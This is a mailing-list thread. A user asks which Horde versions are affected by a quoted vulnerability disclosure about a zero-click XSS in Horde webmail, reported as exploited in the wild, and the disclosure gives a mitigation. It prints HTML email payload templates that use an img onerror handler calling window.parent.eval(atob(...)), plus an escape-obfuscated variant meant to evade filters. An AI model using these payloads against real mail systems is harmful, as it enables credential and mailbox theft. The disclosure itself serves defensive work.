Hi,
is Horde 5.2.23 / 5.2.24 affected?
azurit
Citát "Nataša K. Arh" <natasa.ja...@gmail.com>:
Hi.
I forgot to mention that currently the fastest way to mitigate the
vulnerability is to disable HTML email view and enable only text/plain view
of the email content.
Regards, Tasha & Vito
On Fri, Mar 21, 2025 at 9:18 AM Nataša K. Arh <natasa.ja...@gmail.com>
wrote:
Hi.
A vulnerability within Horde Web Client was discovered during our
investigation. We have already seen this vulnerability being exploited in
the wild.
If an attacker crafts a specially prepared email, he/she can abuse this
vulnerability to retrieve username, password and complete email database
of a user mailbox.
*Details*
The content inside email header base64 encoded text/html boundary contains
a specially crafted HTML.
--===============boundary==
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64
MIME-Version: 1.0
Injecting a XSS payload inside an HTML attribute, namely the “onerror”
event handler, the server-side checks does not sanitize the payload and
does not detect HTML encoded characters.
When the browser renders the page, it will decode and execute the injected
payload.
This is injected at the end of the legit HTML content.
Example:
<html>
<body>
<p>Hi...</p>
Regards<br>
*<math><style>*
*<img style=display:none src=nonexsisting.png
onerror="window.parent.eval(window.parent.atob('base64 encoded
JavaScript'));">*
*</style></math>*
</body></html>
To evade detection Unicode characters can be used:
For eval:
- \u{065} represents the Unicode character for the letter "e."
- \u{076} represents the Unicode character for the letter "v."
- \141 (octal) or \x6C (hexadecimal) represents the letter "a."
- \x6C represents the hexadecimal for the letter "l."
For atob:
- \u{61} represents the Unicode character for the letter "a."
- \u{74} represents the Unicode character for the letter "t."
- o is a regular character.
- \142 (octal) represents the letter "b."
Example:
<html>
<body>
<p>Hi...</p>
Regards<br>
*<math><style><img style=display:none **src=nonexsisting.png*
*
onerror="window.parent['\u{065}\u{076}\141\x6C'](window.parent['\u{61}\u{74}o\142']('base64
encoded JavaScript'))"></style></math>*
</body></html>
The “nonexsisting.png” image is searched inside /imp, since it does not
exist the “onerror” content is executed.
A specially crafted JavaScript code inside the *'base64 encoded
JavaScript'* is executed.
This kind of crafted email is a zero-click attack, where no click is
needed from a user side other then looking this email in the Horde web
client.
Since there are still Horde web clients used, it would be nice to fix this
vulnerability.
--
Regards.
--
imp mailing list
Frequently Asked Questions: http://wiki.horde.org/FAQ
To unsubscribe, mail: imp-unsubscr...@lists.horde.org
--
imp mailing list
Frequently Asked Questions: http://wiki.horde.org/FAQ
To unsubscribe, mail: imp-unsubscr...@lists.horde.org
